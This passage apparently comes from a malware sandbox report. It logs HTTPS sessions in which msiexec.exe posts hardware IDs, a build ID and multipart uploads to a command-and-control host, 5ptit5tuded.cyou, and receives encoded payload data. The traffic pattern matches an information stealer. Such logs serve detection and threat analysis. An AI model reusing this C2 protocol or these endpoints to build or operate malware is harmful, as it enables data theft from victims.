                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                            2024-11-19 19:06:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            1192.168.2.849710188.114.97.34436840C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-11-19 19:06:26 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                            Content-Length: 50
                                                                                                                                                            Host: 5ptit5tuded.cyou
                                                                                                                                                            2024-11-19 19:06:26 UTC50OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 31 30 76 73 30 35 26 6a 3d
                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=MeHdy4--pl10vs05&j=
                                                                                                                                                            2024-11-19 19:06:27 UTC980INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 19 Nov 2024 19:06:27 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Set-Cookie: PHPSESSID=bk1huiq5kokv5f0oo1bcrd5jrm; expires=Sat, 15-Mar-2025 12:53:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R1J6e0Q8BpAcJB7YTrZPfgN8gLczUqc5HUbmNIO1tnkU8jl44I60QNFzt3tT4u1d3U0nh5xJPSRwwYrQgCeLJr5FLK%2B3EddeGgeCtkqO7QjltM2epmpG2UnrUu9G6dDKuYjL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8e527a3e1ff28c6b-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1849&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=950&delivery_rate=1575822&cwnd=140&unsent_bytes=0&cid=33edda2a995f762f&ts=714&x=0"
                                                                                                                                                            2024-11-19 19:06:27 UTC389INData Raw: 34 34 36 63 0d 0a 2f 42 32 6f 70 79 63 30 50 2b 45 47 66 46 72 79 67 6f 47 66 57 39 6a 4e 71 30 61 57 4e 59 30 33 70 38 67 77 6e 69 65 7a 32 56 4f 48 50 39 36 46 48 51 41 54 77 33 55 5a 65 4d 6a 32 38 2b 6f 2b 39 4f 2f 4b 49 72 51 50 36 31 62 4c 75 31 57 79 42 63 57 30 63 63 5a 37 79 63 74 55 55 52 50 44 59 77 52 34 79 4e 6e 36 76 54 36 32 37 35 46 6b 38 31 2f 76 56 73 75 71 55 66 56 49 77 37 55 77 6c 48 48 50 7a 30 4a 58 57 34 42 71 45 54 2b 58 35 2b 44 31 4e 62 47 67 77 79 75 30 47 61 39 53 33 65 6f 4b 76 47 72 57 72 54 4b 78 66 4e 76 4d 42 55 6b 54 6d 69 51 5a 4e 4e 43 34 6f 2f 34 2b 75 71 48 4e 49 76 31 64 35 56 2f 44 71 31 54 30 56 39 71 2f 4f 35 52 2f 7a 4d 35 49 58 6b 2b 4e 59 42 59 30 6b 65 33 67 76 58 66 36 71 4e 46 6b 72 42 65 38 5a 38 61 37 51
                                                                                                                                                            Data Ascii: 446c/B2opyc0P+EGfFrygoGfW9jNq0aWNY03p8gwniez2VOHP96FHQATw3UZeMj28+o+9O/KIrQP61bLu1WyBcW0ccZ7yctUURPDYwR4yNn6vT6275Fk81/vVsuqUfVIw7UwlHHPz0JXW4BqET+X5+D1NbGgwyu0Ga9S3eoKvGrWrTKxfNvMBUkTmiQZNNC4o/4+uqHNIv1d5V/Dq1T0V9q/O5R/zM5IXk+NYBY0ke3gvXf6qNFkrBe8Z8a7Q
                                                                                                                                                            2024-11-19 19:06:27 UTC1369INData Raw: 33 6e 6e 2b 4b 69 77 56 52 52 63 4d 38 58 68 75 56 38 4f 54 78 4c 2f 69 56 69 54 75 36 54 71 39 53 79 65 6f 4b 76 45 33 55 75 44 4b 56 63 4d 6e 4e 54 6b 52 64 6b 57 49 54 50 59 4c 6d 35 76 4d 7a 75 62 33 44 4b 76 4a 55 35 6c 37 4d 72 31 58 34 42 5a 2f 37 4e 6f 59 2f 6b 6f 56 6b 57 31 61 50 62 67 6b 34 30 50 2b 74 35 48 6d 39 6f 34 6c 38 74 46 50 75 55 63 53 75 58 50 4a 42 33 62 30 2f 6b 33 44 4d 7a 30 56 52 56 34 74 73 48 7a 57 62 37 2b 50 34 4e 4c 36 70 78 53 58 78 46 36 45 56 77 72 49 53 70 41 58 2f 76 44 4b 4d 50 66 2f 47 53 31 68 61 6c 53 51 42 64 6f 6d 67 35 50 46 35 34 75 2f 48 49 66 74 46 37 6b 66 41 70 45 44 77 51 4e 65 32 4d 70 42 2f 7a 38 4a 49 57 46 75 45 5a 78 59 38 6b 65 37 76 39 7a 71 2b 72 49 6c 71 74 46 44 33 46 5a 33 71 59 2f 39 42 31 71
                                                                                                                                                            Data Ascii: 3nn+KiwVRRcM8XhuV8OTxL/iViTu6Tq9SyeoKvE3UuDKVcMnNTkRdkWITPYLm5vMzub3DKvJU5l7Mr1X4BZ/7NoY/koVkW1aPbgk40P+t5Hm9o4l8tFPuUcSuXPJB3b0/k3DMz0VRV4tsHzWb7+P4NL6pxSXxF6EVwrISpAX/vDKMPf/GS1halSQBdomg5PF54u/HIftF7kfApEDwQNe2MpB/z8JIWFuEZxY8ke7v9zq+rIlqtFD3FZ3qY/9B1q
                                                                                                                                                            2024-11-19 19:06:27 UTC1369INData Raw: 78 4d 4a 42 57 6c 53 4f 59 68 34 2f 6c 4f 58 78 2b 44 43 32 6f 34 6c 71 74 46 44 33 46 5a 33 71 66 66 74 54 30 70 51 79 6a 33 61 4b 32 67 74 50 48 59 52 6f 58 6d 44 51 35 2b 62 31 4d 72 79 6e 79 54 62 78 57 65 52 55 7a 36 78 54 38 55 6e 58 75 7a 43 65 65 63 62 46 51 6c 46 50 6b 57 45 59 4b 70 71 67 72 62 30 2b 6f 75 2b 52 5a 4d 4a 48 2b 45 54 54 36 47 66 2f 53 39 2b 38 4a 39 35 67 68 4e 77 46 55 56 48 44 50 46 34 7a 6b 4f 7a 6b 39 54 2b 2b 70 38 59 72 2f 55 58 75 57 63 75 34 56 66 78 4d 33 37 51 39 6c 33 4c 4e 79 45 35 63 55 49 64 6a 48 33 6a 65 6f 4f 54 6c 65 65 4c 76 2f 7a 54 35 57 38 46 65 79 61 4d 53 34 77 76 49 2b 7a 61 53 50 35 4b 46 51 56 70 56 69 57 73 58 4d 70 72 76 36 76 30 78 73 36 62 4b 4a 50 68 52 37 6c 6e 4a 70 31 66 2f 51 4e 79 2b 4d 5a 4a
                                                                                                                                                            Data Ascii: xMJBWlSOYh4/lOXx+DC2o4lqtFD3FZ3qfftT0pQyj3aK2gtPHYRoXmDQ5+b1MrynyTbxWeRUz6xT8UnXuzCeecbFQlFPkWEYKpqgrb0+ou+RZMJH+ETT6Gf/S9+8J95ghNwFUVHDPF4zkOzk9T++p8Yr/UXuWcu4VfxM37Q9l3LNyE5cUIdjH3jeoOTleeLv/zT5W8FeyaMS4wvI+zaSP5KFQVpViWsXMprv6v0xs6bKJPhR7lnJp1f/QNy+MZJ
                                                                                                                                                            2024-11-19 19:06:27 UTC1369INData Raw: 6c 6f 64 32 79 51 53 4f 35 7a 6f 37 50 73 77 74 71 58 41 4c 2f 68 63 36 31 6e 4d 72 31 54 39 51 4e 53 36 4e 5a 4a 31 7a 4d 5a 47 57 56 4b 4d 62 46 35 32 30 4f 66 37 76 57 48 36 69 74 34 76 2b 6c 47 76 53 6f 75 7a 45 76 74 4a 6b 65 4e 78 6b 6e 62 4d 77 30 42 61 58 49 56 73 47 7a 43 55 34 65 58 37 4f 72 57 72 7a 43 58 37 55 2b 4e 62 7a 36 74 54 38 45 37 65 73 44 54 65 4d 59 72 43 58 52 59 46 77 31 55 64 4c 6f 66 77 37 37 30 6d 39 4c 61 4a 49 2f 67 58 74 78 58 45 75 46 6a 32 53 39 53 30 4e 4a 31 77 7a 63 68 44 57 6c 65 4b 62 42 67 33 6d 66 4c 67 38 54 65 39 6f 63 55 71 2b 56 33 73 57 49 58 6b 45 76 74 64 6b 65 4e 78 73 6e 6a 48 36 30 35 61 57 73 4e 37 55 43 48 51 35 2b 2b 39 59 66 71 6a 77 79 6a 39 56 2b 5a 51 7a 61 46 62 2b 55 54 61 76 6a 4b 59 63 73 58 4d
                                                                                                                                                            Data Ascii: lod2yQSO5zo7PswtqXAL/hc61nMr1T9QNS6NZJ1zMZGWVKMbF520Of7vWH6it4v+lGvSouzEvtJkeNxknbMw0BaXIVsGzCU4eX7OrWrzCX7U+Nbz6tT8E7esDTeMYrCXRYFw1UdLofw770m9LaJI/gXtxXEuFj2S9S0NJ1wzchDWleKbBg3mfLg8Te9ocUq+V3sWIXkEvtdkeNxsnjH605aWsN7UCHQ5++9Yfqjwyj9V+ZQzaFb+UTavjKYcsXM
                                                                                                                                                            2024-11-19 19:06:27 UTC1369INData Raw: 4d 38 58 6a 36 66 36 65 44 79 4f 4c 4f 6a 78 43 48 39 55 75 35 54 77 61 42 59 2f 45 50 58 75 6a 53 55 66 4d 76 50 54 46 46 56 68 47 63 4d 65 4e 36 67 35 4f 56 35 34 75 2f 67 49 2b 5a 5a 2f 78 58 61 35 45 75 38 51 74 33 37 61 64 35 37 77 4d 70 42 55 56 47 46 59 52 67 31 6b 65 2f 69 2f 54 61 2b 70 4d 41 69 39 56 72 71 57 4d 47 34 57 50 64 4b 33 62 49 39 6b 7a 2b 45 68 55 4a 4f 48 64 73 6b 4c 7a 57 65 37 75 54 72 65 61 58 68 30 47 54 7a 57 36 38 4e 68 61 74 65 38 30 62 65 75 44 4b 66 64 64 6a 58 53 56 39 56 68 6d 67 56 4e 70 62 79 35 66 49 77 75 61 7a 41 49 2f 78 62 35 56 62 43 36 68 79 38 51 73 6e 37 61 64 35 63 33 64 56 49 46 6b 4c 4e 66 56 34 2f 6e 4b 43 37 76 54 47 33 70 38 4d 67 38 31 72 6f 55 38 79 34 57 2f 6c 4c 30 62 38 36 6b 58 6e 4f 78 6b 56 45 57
                                                                                                                                                            Data Ascii: M8Xj6f6eDyOLOjxCH9Uu5TwaBY/EPXujSUfMvPTFFVhGcMeN6g5OV54u/gI+ZZ/xXa5Eu8Qt37ad57wMpBUVGFYRg1ke/i/Ta+pMAi9VrqWMG4WPdK3bI9kz+EhUJOHdskLzWe7uTreaXh0GTzW68Nhate80beuDKfddjXSV9VhmgVNpby5fIwuazAI/xb5VbC6hy8Qsn7ad5c3dVIFkLNfV4/nKC7vTG3p8Mg81roU8y4W/lL0b86kXnOxkVEW
                                                                                                                                                            2024-11-19 19:06:27 UTC1369INData Raw: 34 33 71 44 6b 35 58 6e 69 37 2b 67 2f 39 31 76 69 46 64 72 6b 53 37 78 43 33 66 74 70 33 6e 50 45 77 45 56 63 57 34 64 68 47 44 4b 56 34 4f 6a 2b 4e 72 36 70 7a 53 76 30 58 4f 5a 55 77 36 39 59 39 30 50 63 75 44 65 59 50 34 53 46 51 6b 34 64 32 79 51 2b 49 35 33 73 35 4c 30 6d 39 4c 61 4a 49 2f 67 58 74 78 58 4f 70 6c 62 37 52 64 79 34 4f 5a 74 37 77 4d 42 46 58 6b 2b 4c 5a 42 6b 71 67 75 44 71 2b 44 57 35 72 38 30 69 2f 56 48 73 55 59 58 6b 45 76 74 64 6b 65 4e 78 73 33 50 4e 37 45 4a 4e 48 5a 77 71 42 33 69 58 37 4b 4f 6c 65 62 75 6b 77 79 76 35 56 4f 6c 57 7a 71 39 59 2f 55 4c 5a 74 69 4f 64 63 4d 58 42 52 56 6c 62 68 57 55 52 50 70 66 70 34 76 55 2b 2b 75 47 4a 49 2b 77 58 74 78 58 72 72 56 48 34 42 63 37 31 4b 4e 35 34 78 6f 55 64 46 6c 32 4a 62 68
                                                                                                                                                            Data Ascii: 43qDk5Xni7+g/91viFdrkS7xC3ftp3nPEwEVcW4dhGDKV4Oj+Nr6pzSv0XOZUw69Y90PcuDeYP4SFQk4d2yQ+I53s5L0m9LaJI/gXtxXOplb7Rdy4OZt7wMBFXk+LZBkqguDq+DW5r80i/VHsUYXkEvtdkeNxs3PN7EJNHZwqB3iX7KOlebukwyv5VOlWzq9Y/ULZtiOdcMXBRVlbhWURPpfp4vU++uGJI+wXtxXrrVH4Bc71KN54xoUdFl2Jbh
                                                                                                                                                            2024-11-19 19:06:27 UTC1369INData Raw: 33 4c 4e 35 6f 75 2b 52 5a 4d 46 55 34 56 76 43 76 45 4f 78 59 73 65 78 4e 6f 35 34 33 63 6f 46 47 42 32 46 4a 45 5a 72 33 71 44 6e 37 48 6e 69 2f 35 74 2f 6f 51 53 34 42 5a 65 31 48 4f 55 46 78 2f 74 70 7a 44 47 4b 31 77 55 4f 48 63 52 6e 44 43 71 57 34 2f 58 2b 66 6f 53 52 37 6a 37 35 55 66 68 45 2b 35 52 56 35 6b 6a 58 72 43 44 53 61 73 6e 4c 53 31 46 4c 77 79 70 65 4e 39 43 34 32 72 31 78 2b 70 43 48 5a 4f 77 58 74 78 58 77 71 56 7a 79 51 73 65 71 66 4c 6c 6c 78 38 4e 53 52 78 33 4e 4a 42 68 34 79 4c 43 74 76 54 32 72 37 35 46 30 70 67 79 36 42 70 4c 36 41 4f 4d 4c 79 50 73 6e 33 69 65 59 69 77 56 45 48 64 73 6b 57 54 75 43 38 75 58 2b 4c 37 6e 6f 39 78 72 61 55 4f 6c 51 77 72 6f 51 30 6b 37 46 76 48 48 51 50 38 57 46 48 57 38 64 79 79 51 68 64 74 44
                                                                                                                                                            Data Ascii: 3LN5ou+RZMFU4VvCvEOxYsexNo543coFGB2FJEZr3qDn7Hni/5t/oQS4BZe1HOUFx/tpzDGK1wUOHcRnDCqW4/X+foSR7j75UfhE+5RV5kjXrCDSasnLS1FLwypeN9C42r1x+pCHZOwXtxXwqVzyQseqfLllx8NSRx3NJBh4yLCtvT2r75F0pgy6BpL6AOMLyPsn3ieYiwVEHdskWTuC8uX+L7no9xraUOlQwroQ0k7FvHHQP8WFHW8dyyQhdtD
                                                                                                                                                            2024-11-19 19:06:27 UTC1369INData Raw: 62 36 2b 69 58 79 6b 42 62 51 41 6c 76 30 43 72 6c 71 66 6f 6e 47 49 50 35 4b 58 43 78 5a 50 77 7a 78 65 66 35 50 79 38 66 73 36 72 4b 79 4f 47 73 70 77 34 56 4c 45 76 45 4c 72 53 70 36 56 42 37 39 42 39 4e 42 47 57 46 4f 45 63 67 39 34 33 71 44 73 76 57 47 44 37 34 46 6b 79 78 6d 76 54 59 58 79 45 73 6c 47 33 37 55 32 69 47 36 48 34 6b 74 52 58 4a 56 30 43 54 66 66 7a 74 58 63 65 66 54 76 7a 32 53 73 42 61 45 56 77 62 73 53 70 42 57 44 34 47 54 4e 4b 4a 71 58 57 68 68 45 77 33 4a 65 59 4d 4b 75 6f 2b 39 35 34 75 2b 4f 4a 2b 5a 46 36 56 62 54 71 52 58 43 65 2f 61 31 4e 70 39 70 32 73 68 4a 64 31 36 53 62 69 41 47 68 65 50 74 38 7a 36 73 76 6f 6c 71 74 46 69 76 44 66 7a 71 47 72 78 36 6e 2f 73 70 33 69 65 4b 38 45 5a 59 55 34 52 79 44 33 57 33 37 75 54 38
                                                                                                                                                            Data Ascii: b6+iXykBbQAlv0CrlqfonGIP5KXCxZPwzxef5Py8fs6rKyOGspw4VLEvELrSp6VB79B9NBGWFOEcg943qDsvWGD74FkyxmvTYXyEslG37U2iG6H4ktRXJV0CTffztXcefTvz2SsBaEVwbsSpBWD4GTNKJqXWhhEw3JeYMKuo+954u+OJ+ZF6VbTqRXCe/a1Np9p2shJd16SbiAGhePt8z6svolqtFivDfzqGrx6n/sp3ieK8EZYU4RyD3W37uT8
                                                                                                                                                            2024-11-19 19:06:27 UTC1369INData Raw: 6f 79 39 78 65 68 46 64 33 71 43 72 78 6f 77 37 77 68 6e 54 33 6d 77 6b 68 61 48 5a 77 71 42 33 69 47 6f 4c 75 75 64 2f 71 39 69 58 79 30 45 4f 78 48 31 36 78 52 36 6b 61 57 68 51 2b 7a 62 63 33 56 52 68 52 73 6a 6d 41 49 4c 5a 50 77 35 4d 4d 48 6c 37 33 4f 4e 50 63 56 79 6d 2b 48 6d 30 54 2f 52 64 2b 38 63 64 41 2f 30 6f 55 64 46 6e 43 52 59 77 34 37 30 73 58 5a 76 77 69 73 72 4d 6b 71 38 78 66 77 47 39 7a 71 52 4c 77 64 67 76 56 78 6a 44 2b 53 68 51 4a 59 55 49 4a 6e 45 44 75 43 38 75 58 2b 4c 37 6e 6f 39 78 72 62 58 4f 35 46 79 4c 74 66 2b 46 50 76 68 52 61 59 65 73 33 37 65 32 46 4d 68 48 52 63 48 70 50 32 34 4c 31 33 2b 72 65 4a 66 4c 52 77 36 56 44 43 36 68 79 38 51 5a 48 6a 63 62 46 30 79 39 56 49 52 31 43 48 63 6c 77 66 6c 75 58 6b 76 58 66 36 6f
                                                                                                                                                            Data Ascii: oy9xehFd3qCrxow7whnT3mwkhaHZwqB3iGoLuud/q9iXy0EOxH16xR6kaWhQ+zbc3VRhRsjmAILZPw5MMHl73ONPcVym+Hm0T/Rd+8cdA/0oUdFnCRYw470sXZvwisrMkq8xfwG9zqRLwdgvVxjD+ShQJYUIJnEDuC8uX+L7no9xrbXO5FyLtf+FPvhRaYes37e2FMhHRcHpP24L13+reJfLRw6VDC6hy8QZHjcbF0y9VIR1CHclwfluXkvXf6o


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            2192.168.2.849712188.114.97.34436840C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-11-19 19:06:30 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: multipart/form-data; boundary=15SYDMEWXHQKVCM
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                            Content-Length: 12831
                                                                                                                                                            Host: 5ptit5tuded.cyou
                                                                                                                                                            2024-11-19 19:06:30 UTC12831OUTData Raw: 2d 2d 31 35 53 59 44 4d 45 57 58 48 51 4b 56 43 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 46 44 37 38 34 43 45 46 45 41 45 34 41 43 45 31 46 36 38 31 34 42 31 36 44 35 41 31 39 43 0d 0a 2d 2d 31 35 53 59 44 4d 45 57 58 48 51 4b 56 43 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 35 53 59 44 4d 45 57 58 48 51 4b 56 43 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 30 76 73 30 35 0d 0a 2d 2d 31 35
                                                                                                                                                            Data Ascii: --15SYDMEWXHQKVCMContent-Disposition: form-data; name="hwid"7AFD784CEFEAE4ACE1F6814B16D5A19C--15SYDMEWXHQKVCMContent-Disposition: form-data; name="pid"2--15SYDMEWXHQKVCMContent-Disposition: form-data; name="lid"MeHdy4--pl10vs05--15
                                                                                                                                                            2024-11-19 19:06:30 UTC995INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 19 Nov 2024 19:06:30 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Set-Cookie: PHPSESSID=j6mcuemrtbns12t8v6c5k02um5; expires=Sat, 15-Mar-2025 12:53:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ccQLoK75bw5RuVmntQM%2BUltN231zPfMkOngHpwCQxrIUO%2B336HBbY19j4honMpFIro3L8Sfar1R%2Bu%2BdxzJRJlMEKcE%2FoBuDLNvaX%2BcVSjMzhB104yhvWDfMMKj7dbB1pin%2Bw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8e527a540f4842e7-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1671&sent=7&recv=16&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13768&delivery_rate=1695702&cwnd=237&unsent_bytes=0&cid=0837be77302243d6&ts=712&x=0"
                                                                                                                                                            2024-11-19 19:06:30 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                            Data Ascii: eok 8.46.123.75
                                                                                                                                                            2024-11-19 19:06:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            3192.168.2.849713188.114.97.34436840C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-11-19 19:06:31 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: multipart/form-data; boundary=VOHK04ZTITUZBUUF
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                            Content-Length: 15066
                                                                                                                                                            Host: 5ptit5tuded.cyou
                                                                                                                                                            2024-11-19 19:06:31 UTC15066OUTData Raw: 2d 2d 56 4f 48 4b 30 34 5a 54 49 54 55 5a 42 55 55 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 46 44 37 38 34 43 45 46 45 41 45 34 41 43 45 31 46 36 38 31 34 42 31 36 44 35 41 31 39 43 0d 0a 2d 2d 56 4f 48 4b 30 34 5a 54 49 54 55 5a 42 55 55 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 4f 48 4b 30 34 5a 54 49 54 55 5a 42 55 55 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 30 76 73 30 35 0d 0a 2d
                                                                                                                                                            Data Ascii: --VOHK04ZTITUZBUUFContent-Disposition: form-data; name="hwid"7AFD784CEFEAE4ACE1F6814B16D5A19C--VOHK04ZTITUZBUUFContent-Disposition: form-data; name="pid"2--VOHK04ZTITUZBUUFContent-Disposition: form-data; name="lid"MeHdy4--pl10vs05-
                                                                                                                                                            2024-11-19 19:06:33 UTC986INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 19 Nov 2024 19:06:33 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Set-Cookie: PHPSESSID=r4cif6cnrats32q2ngjd99hddu; expires=Sat, 15-Mar-2025 12:53:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nLwvWYGTruYsRpgBwVYQDknqiiRsGQNNeqhOeu1sSMTHkqLnfYMxsUQt8ENDUw3fm57Qy0Pl8d1VevNoszBXx1Q6IWOqPz%2BDKsra%2BDw3FWyBIqNeA0dJPjQZPXA1rxThrjtL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8e527a5befedc413-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1698&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2838&recv_bytes=16004&delivery_rate=1649717&cwnd=173&unsent_bytes=0&cid=541201e289b08d8e&ts=2387&x=0"
                                                                                                                                                            2024-11-19 19:06:33 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                            Data Ascii: eok 8.46.123.75
                                                                                                                                                            2024-11-19 19:06:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            4192.168.2.849714188.114.97.34436840C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-11-19 19:06:34 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: multipart/form-data; boundary=INXXJSED9RCD5XIT
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                            Content-Length: 20233
                                                                                                                                                            Host: 5ptit5tuded.cyou
                                                                                                                                                            2024-11-19 19:06:34 UTC15331OUTData Raw: 2d 2d 49 4e 58 58 4a 53 45 44 39 52 43 44 35 58 49 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 46 44 37 38 34 43 45 46 45 41 45 34 41 43 45 31 46 36 38 31 34 42 31 36 44 35 41 31 39 43 0d 0a 2d 2d 49 4e 58 58 4a 53 45 44 39 52 43 44 35 58 49 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 49 4e 58 58 4a 53 45 44 39 52 43 44 35 58 49 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 30 76 73 30 35 0d 0a 2d
                                                                                                                                                            Data Ascii: --INXXJSED9RCD5XITContent-Disposition: form-data; name="hwid"7AFD784CEFEAE4ACE1F6814B16D5A19C--INXXJSED9RCD5XITContent-Disposition: form-data; name="pid"3--INXXJSED9RCD5XITContent-Disposition: form-data; name="lid"MeHdy4--pl10vs05-
